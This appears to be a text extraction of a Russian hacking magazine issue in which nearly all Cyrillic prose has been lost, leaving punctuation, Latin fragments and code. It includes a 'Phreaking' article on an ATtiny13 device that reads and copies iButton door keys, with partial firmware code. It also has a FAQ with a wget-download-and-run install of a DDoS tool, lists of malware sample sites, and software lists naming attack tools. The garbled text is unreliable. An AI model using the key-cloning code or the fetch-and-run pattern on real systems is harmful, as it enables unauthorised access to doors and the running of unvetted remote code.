. ,
, ,
. , :

) ;
) ;
) ,
.
. :
(. 1301 ).
,
, .
, ,
,

. .

( )
. , , ,
. . ,

, . ,
, ,
.
:
,
, , ;
, ,
, ;
,
;
- ;
. 1262 ;
, , , (,
);

;
, (,
);
/ ,
;
(
, , - );
, , ,
. ,
, ,
.

, .
,
.

, , , .
( )
. . ,
, ,
.
, ,
.
( . 10 ).
. , ,
, , , ,
,
, .
, ,
.
(. 1251 ).
, :
. , ,
,
. , . ,
.

,
1993 , .
,
.
, .
.
. , , , . () .
.
,

, **.
. ,
,
, .
,
: , . ? . . z

* , ,
, , , . ,
( , ) ,
.
** , , . . (, . 3 . 1250
). . , .


PHREAKING
dcoder (dcoder.mail@gmail.com)


iButton
,
iButton,
.

. , ,

,
.

, 1-wire

-, . , , , ,
1-wire.
. . , ,
, , ,
(
).
,
. EEPROM . ,
8 EEPROM- ( , 6 ).
, , learn,
,
. ,
,
.
, -
. , . CR2032,
. ,
, 5V VSB ( )
. 5 V, (, ). (5 V ) .


1-wire, ,
. , , .
1-wire , , .
( 5 V) .
.
,
. ,
(, DS18b20).
1-wire (master)
(slave). ,
. ,
.
,
.
( )
. , ,
.
(5-10 ), ( 50-100 ).
,
,
.
: RESET, 480 ,
, PRESENCE,
100-200 , ,

. 1. .
()

. 2. 1-wire

RESET. ,
.
:
1. RESET.
2. PRESENCE ( !).
3. ROM-. 8
ROM- ,
. (
DS1990A iButton)
.
4. ROM-
, . ROM-
Read ROM (0x33).
ROM- . DS1990A
0x01. 6 CRC.
(
CRC) EEPROM.
, CRC .
- ,
. :
RESET PRESENCE- .

, , . , ,
.
: , ,
, .

, ,
. ,
. ,
,
. ,
.

.
. , ,
- ARM,
ATTiny13. learn, 1-wire, ( ,
) (.
. 6). ,
, NPN. BC846 SMD-, .
(X1) (X2)
. , ,
.
5
. , . (+5) .
(5 V )
. , -. D1,
D2 . , -


( -> )

( -> )

. 3.
D2, D1 . D2 . , 0,2 .
, .

. (. DI HALTa ][ 118, 2008


). .
. ,
. ,
, .
. -
. ,

. ,
FDD. ViewLayout (goo.gl/kRKXE).
.
, - 1,6 .
, , , . , ,
. ,
( ),
. .

. , 95% , AVR
, .
MikroPascal for AVR ( k , ).
2 .
Tiny13 1 -.
, .
, .
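ACSR.ACD := 1; // disable the analog comparator
DDRB := %00010001; // pin directions
// outputs: B4 and B0
PORTB := %00001001; // B0 driven high, pull-up enabled on B3
MCUCR.SM0 := 1; // power down
MCUCR.SE := 1; // enable the sleep instruction
asm sei end; // enable interrupts globally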

, ,
.
GIFR.INTF0 := 1; // clear the INT0 interrupt flag
GIMSK.INT0 := 1; // enable the INT0 interrupt
asm sleep end; // go to sleep!

INT0 ( B1) .
, ( ,
) sleep.
, INT0_rq.
,
. , (
sleep) .
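Delay_ms(2); // short delay before the RESET pulse
DDRB.1 := 1; // pull the line low: RESET pulse
Delay_us(500);
DDRB.1 := 0; // release the line to the pull-up
Delay_us(50);
// if the line is still high, there is no PRESENCE pulse
if PINB.1=1 then continue;
// PRESENCE pulse detected
Delay_us(250); // wait for the PRESENCE pulse to end
Read_iButton; // read the key
if CRC_OK <> 0 then continue; // nonzero CRC: read failed, start over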

. ,
,
. RESET-.
1 DDRB. . ,
, ( , )
PORTB ( ).
DDRB , . ,
DDRB 1, , 0 , pull-up-. RESET , PRESENCE. ,
, - .
, .
, . :
1. ROM- 0x33.
2. 8 , CRC:
CRC_OK.
3. ROM_Data.
CRC 256 . CRC ,

. 4. RESET PRESENCE,

. 5.
CRC := CRC_Table[CRC xor DataByte];. ,
, CRC = 0. CRC , .
ReadROM- CRC_OK. = 0, .
CRC, ,
iButton ( )
(CRC8).
learn. ,
EEPROM,
. , , ,
, EEPROM. .
, ,
.

, , , ?
,
, : , AVR
.
AVR .
.
COM-. USBCOM . PCICOM .
COM- , , .
, , .
,
:).

. , ? :)
1 10 ,
.
. 5.
, . ,
. (, +5 USB),
Vcc .
- ,
, (Gnd).
Uniprof.
.
Uniprof , ,
. ATTiny13,
flash [1K, 64] Tiny13
1 - 64 EEPROM. ,
( ) .
- Erase.


hex ( , firmware).
.
PROG . ,
. 10
.
.
fuse. ,
, .
,
.
CKDIV8, . ,
1,2 , 9,6 . fuse . fuse . - ,
Read ,
. AVR ,
CKDIV8 , . ,

. 6.
Write,
. , .

, .
, - ,
:). , , AVR
1-wire. ,
. , ,
. . z


UNITS
Step (twitter.com/stepah)

faq
united?

faq@real.xakep.ru

Q: DDoS.
wget http://www.inetbase.com/scripts/ddos/install.sh

chmod 0700 install.sh
- ./install.sh
?
A: -

Q:

. ?

, ?
A:

, iptables.
, ,

(, ). ,
.
(D)DoS Deflate
(deflate.medialayer.com). bash-,
IP-,
, .
:
,

. : iptables
Advanced Policy Firewall (APF). DoS Deflate :

.
-, ,

. ,
(
), , .

,
:
Adminus Malware Analysis Group Samples
(adminus.net/samples.aspx);
Contagio Malware Dump (contagiodump.blogspot.com);
KernelMode.info (www.kernelmode.info/forum/viewforum.php?f=16);
MalwareBlacklist (www.malwareblacklist.com/showMDL.php);
MalwareBytes Forum (forums.


/usr/local/ddos/ddos.conf NO_OF_CONNECTIONS.

,
,
NAT. ,
.
,

,
. ,

,
.

,

, : .



Google



malwarebytes.org);
NovCon Twitter EXE Parsing
(minotauranalysis.com/exetweet);
Offensive Computing (www.offensivecomputing.net);
SecuBox Labs (secuboxlabs.fr).
-,
, ,
.
URL www.malwaredomainlist.com www.malwareurl.com.
: ,

, , ,
, .
-,
honeypot,
. ,
.

Q: ,
?
A: ,
100%
. :
Glastopf (glastopf.org) ,
-
.
.
Dionaea (dionaea.carnivore.it) ,
.

Windows,
.
Dionaea

.
Jsunpack-n (code.google.com/p/jsunpack-n)

.
, -
.
,

, Omnivora (sourceforge.net/projects/omnivora) Amun (sourceforge.net/projects/amunhoney).

Q:
,
?
A:
,
,
Intel Core i5/i7. , Intel
vPro
KVM Remote Control. KVM
(Keyboard Video Mouse)
: KVM-

, . KVM Intel?
,
,
.
,
, ,
. ,

Remote FrameBuffer
( VNC), , ,

, .
Android, ?

.
, ,
.

Intel (intel.ly/pgTnGM),
vPro .
KVM Remote Control
Support. :
,
.

Q: -
Wi-Fi- ?

-
.
.



A: 1.
( omni antenna).
2.
.
, , DD-WRT,

.
Wireless
Advanced Settings,
TX Power,
.
, , 70,

100 ( ,
).
,
. AP
150
.
DD-WRT,
(www.dd-wrt.com).
3.

, .
Wi-Fi (, inSSIDer) ,
.
.
4. ,
AP (
) .
. DD-WRT
Wireless Basic Settings Repeater.
: Wireless Physical Interface (wl0)
Virtual Interfaces (wl0.1).

, SSID
.
Wireless Security
.


Q: ? , .
A: ,
, , .
Wi-Fi, ,

.
,
.
. ,

.
WiFuzz (code.google.com/p/wifuzz), ,
.
Python-
Scapy, .

Q: . ,
.
.
?
A: ProduKey
(www.nirsoft.net),
Microsoft Office, Windows, Exchange Server
SQL Server.

( ).
%windir%\system32\config.

Q: -
Dropbox, .
. ?
A: Dropbox SparkleShare (sparkleshare.org).

,
.
Linux
Mac,
.
github.com/hbons/SparkleShare.

Q: PowerShell/BAT

. , Windows
,
.
?
A:
WinAPI,



.
notifu (www.paralint.com/projects/notifu).

,
, . , :
notifu /m "Hello, man!"

,
notifu
.

Q: BAT-? , ,
,
.

PowerScript VBScript.
A: , , ,

exe-. ,
Quick Batch File Compiler (www.abyssmedia.com/quickbfc). VBScript
JavaScript ScriptCryptor Compiler
.
PowerScript,
Make-PS1ExeWrapper (bit.ly/paIgIW).
PrimalScript (www.sapien.com/software/primalscript),
.

Q:
(- !) ?
A: ,

.

JavaScript,
.

heatmap ,
.
-
,
.
,
, - .
ClickHeat (www.labsmedia.com/clickheat).
Google
Analytics ..

Q: GMail
,
? ,
/
, . ,
? :)
A: !
,
,

Google.
,
( Multiple sign-in)
.
google.com/accounts. , Google
,
.

Q:
-.
,
,

.
A:
Plupload (www.plupload.com),

, drag'n'drop,
,
..

, , , HTML5.
HTML, :
Flash, Gears, Silverlight, BrowserPlus
HTML4. .

Q: , -
Android.
: Android
Market !
?
A: . ,

Android Market , .
,
Android Market
. ,


.
Market
enabler (code.google.com/p/market-enabler).
z


>Net
Angry IP Scanner 3.0-beta6
Axence NetTools 4.0
Cloud Turtle
G+ Notifier 1.7
GPING (Graphical Ping) 1.0.2
Helicon Ape 0068
JStock 1.0.6d
NetGrok

>>UNIX
>Desktop
3dDesktop 0.2.8
Audacious 3.0
Compiz 0.9.5
digiKam 2.0

>Security
Auto Rooter Beta 2011
avast! Linux Home Edition 1.3.0
AVIRA AntiVir Workstation 3.0.2
Complemento 0.7.6
Damn Small SQLi Scanner v0.1f
exploitdbee
F-Prot Antivirus 6.0.3
Firecat 1.6
IP Flood Detector 1.0
Iscanner 0.5
Mantra Security Toolkit 0.6.1

>Net
BitTorrent 5.2.2
DreaMule 3.2
Dropbox 1.1.35
Flush 0.9.11
Google Chrome 13
JAP 00.15.018
Kommute 0.24
Kopete 1.0
Mozilla Firefox 5.0.1
Mumble 1.2.3
Opera 11.50
ProZilla 2.0.4
QuickDownloader 5.0
RealVNC 4.4.3
Teamwork 4.7
theMeStream
Ttcp
>>MAC
Afloat 2.4
atMonitor 2.7b
Backuplist+ 8.0.3
Boxer 1.1.1
Game Hunter 1.1.17
Google Chrome 13
iChm 1.4.3
Integrity 3.7
MacHacha 4.0.1
MakeMKV 1.6.13
Optimizer 1.2
Praat 5.2.35
qBitTorrent 2.8.1
TotalTerminal 1.1.1
Ukelele 2.1.7
XRG 1.6.1
YoruFukurou 2.61
YouTube to MP3 1.5
YouView 0.5 Beta 4

>X-distr
Gentoo Linux 11.2

>System
Aircrack-ng 1.1
AMD Catalyst 11.7
Cpuburn 1.4
CpuTemp 0.1
E2fsprogs 1.41.14
EncFS 1.7.0
LDAP Account Manager 3.4.0
Linux Kernel 3.0.1
Nvidia 280.13
Open Hardware Monitor 0.3.2
Qtnotifydaemon 1.0.4
Shake 0.999
Squashfs 3.4
Ubuntu Tweak 0.5.14
VirtualBox 4.1

>Server
Apache 2.2.19
BIND 9.8.0
CUPS 1.5.0
DHCP 4.2.1
Moment Video Server 1.0
MySQL 5.5.15
nginx 1.1.0
OpenLDAP 2.4.26
OpenSSH 5.8
OpenVPN 2.2.1
PostgreSQL 9.0.4
Samba 3.5.11
Sendmail 8.14.5
Squid 3.1.14
XMail 1.27

Metagoofil 1.4b
Rootkit Hunter 1.3.6
SquidClamAv 6.3
Social-Engineer Toolkit 1.5.3
Sqlninja 0.2.5
Webtest 1.2.1
WPScan

>Multimedia
Blumind 1.3
Doro 1.64
Graphs Made Easy 3.1
MiniLyrics 7.1


:
EasyRecovery 6.1 Professional
(Demo)
File Scavenger
GetDataBack for NTFS V4.21
GetDataBack for FAT V4.21
R-Studio 5.4
Recuva 1.40
R.saver 1.0
RecoverMyFiles 4.7.2
UFS Explorer Standard Recovery
4.9.2

>System
Appupdater 1.5
Auslogics Disk Defrag 3.2.1
Autoruns 10.07
Comodo System-Cleaner 3.0
DualMonitor Taskbar
ExactFile 1.0
Folder Replica 1.03
GrokEVT 0.5.0
Microsoft Security Essentials
Multi Commander 1.1.1.800
Metamorphose 1.1.2
PC INSPECTOR File Recovery
ProEject 1.0
QtdSync v0.6.15 beta
RAID Reconstructor 4.21
ServiWin 1.48
ShutdownGuard 1.0
USB Flash Benchmark
xplorer lite

>Devel
Apache Ant 1.8.2
Bison 2.5
Crow Designer 2.99.0
Fasm 1.69.31
Glade 3.10.0
Gnat 2011
Intel C++ Compiler 12.0.2
Java SE 7
LevelDB
libjpeg 7
Libnet 1.1.2.1
libusb 0.1.12
Monkeybars 1.0.4
Qooxdoo 1.5
Rats 2.3
TkInter 2.4.2
Waf 1.6.4
zlib 1.2.5

Dynamic window manager 5.9


Hash Checker 4.0.1
JShot 2.0
Kat 0.6.4
Kpackage 3.5.10
NeroLINUX 4.0.0.0
Openbox 3.4.11.2
PieDock 1.4.0
RawTherapee 3.0
Splashy 0.3.13
Wbar 1.3.3
Xfce 4.8.0
XWinWrap 0.10
)

UI-:
360desktop 0.8.5
Acer Gridvista 2.72.317
Bins
Desktops 1.02
eXtra Buttons
Fences
Gmail Notifier Plus 2.1.2
HashTab 4.0
JumpPad 2.1
Launchy 2.6B2
Listary
multibar 1.1.1.0
QTTabBar 2.0.0.0beta
SuperbarMonitor
Switcher 2.0.0
Taskbar Meters 1.1
TeraCopy 2.2 beta 3
Windows 7 Taskbar Items Pinner

>Misc
Blumind 1.3
Gest
Metro Clock 2
Metro Sidebar 1.0
Multi-Tabber 1.0
nSpaces
PowerGDocs 1.1
Tabbles 2.0
WindowsRunHistoryEditor 1.2.0.0

>Games
Subvein 0.692

>Security
Cain & Abel v4.9.41
CrashMe
Durandal
FindBugs 1.3.9
Heap Inspector 1.1
IDR 2.5.2.11 beta
mediggo 0.4.0
Metasploit 4.0
Patriot NG v2.01
PDF Stream Dumper
Process Hacker 2.10
Visual DuxDebugger 2.8
VMSweeper 1.4 Beta 12
Volatility 2.0

Uniform Server 7.1.4


VNC Free Edition for Windows 4.1.3
Wifi Network Backup Manager Utility
Windows Firewall Notifier 1.0.1
Wireless Network Watcher 1.15
Wireshark 1.6.1
zFTPServer Suite 2010-10


>>WINDOWS
>Development
GanttProject 2.0.10
IntelliJ IDEA 10.5.1 Free Community
Edition
Jailer 3.6.4
Java SE Development Kit 7
Node.JS 0.5.3
PhoneGap 1.0
Sublime Text 2
Syser Kernel Debugger
1.99.1900.1220 Trial
Syser Win32 Debugger Free
Titanium Studio
wyBuild 2.6

HTTP://WWW2

FETCH.IO
fetch.io

CRYPTOCAT
crypto.cat

,
,
Rapidshare, . (, 100-
- ), . ,
JDownloader (jdownloader.org),

CAPTCHA, ,
. 100%- . fetch.io (, Premium-)
(Depositfiles, Rapidshare,
MegaUpload ..) P2P- ( BitTorrent) . ,
, ,
.


.
OTR (Off-the-Record), cryptocat ,
.
( JavaScript ). -
AES-256
.
, . 30 ,
SSL-.
cryptocat, , GitHub (github.com/kaepora/cryptocat).

KEEPMEOUT!
keepmeout.com

KICKSTARTER
www.kickstarter.com

,
, ,
.
Facebook,
, -
, KeepMeOut!.
, .
, KeepMeOut! ,
60 .
, .
. , vkontakte.ru
KeepMeOut! 6- .

- , . ,
, . ,
, !
(, ,
, , , , ) , .
,
, , .
. ,
500 (www.hexbright.com)
$31 000. , ,
,
$259,293. , ?
